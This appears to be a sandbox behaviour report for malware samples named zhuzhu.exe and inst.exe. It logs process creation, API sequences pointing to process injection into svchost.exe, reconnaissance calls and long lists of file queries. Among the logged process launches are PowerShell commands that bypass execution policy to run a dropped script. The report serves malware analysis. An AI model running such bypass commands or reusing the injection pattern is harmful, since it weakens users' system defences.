                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_037777E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,4_2_037777E0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe4_2_037777E0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe4_2_037777E0
                                      Source: C:\Users\user\Desktop\zhuzhu.exeProcess created: C:\Users\user\Desktop\._cache_zhuzhu.exe "C:\Users\user\Desktop\._cache_zhuzhu.exe"
                                      Source: C:\Users\user\Desktop\zhuzhu.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeProcess created: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe "C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                      Source: ._cache_zhuzhu.exe, 00000004.00000002.4160565471.0000000003A04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
                                      Source: inst.exe, 00000007.00000002.4159349307.0000000062BE5000.00000002.00000001.01000000.00000012.sdmp, sites.dll.7.drBinary or memory string: gShell_traywnd*.*
                                      Source: inst.exeBinary or memory string: Shell_traywnd
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001665C0 cpuid 7_2_001665C0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,4_2_03775430
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_001F7AB2
                                      Source: C:\Users\user\Downloads\inst.exeCode function: GetLocaleInfoA,7_2_0020C813
                                      Source: C:\Users\user\Downloads\inst.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,7_2_001F7569
                                      Source: C:\Users\user\Downloads\inst.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_001F7A4B
                                      Source: C:\Users\user\Downloads\inst.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,7_2_001F7AEE
                                      Source: C:\Users\user\Desktop\zhuzhu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{D5BF8E62-3285-45ad-A7CB-467DE934221E}.tmp VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{B7A42130-77F9-4b13-8C0B-EB34FF385D20}.tmp VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{2E43FD7B-E729-4283-947B-1D49591810C4}.tmp VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                                      Source: C:\Users\user\Downloads\inst.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Users\user\Desktop\._cache_zhuzhu.exe Code function: 1_2_100113E9 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_100113E9
Source: C:\Users\user\Downloads\inst.exe Code function: 7_2_001B8A46 _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW,7_2_001B8A46
Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe Code function: 4_2_03785D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,4_2_03785D22
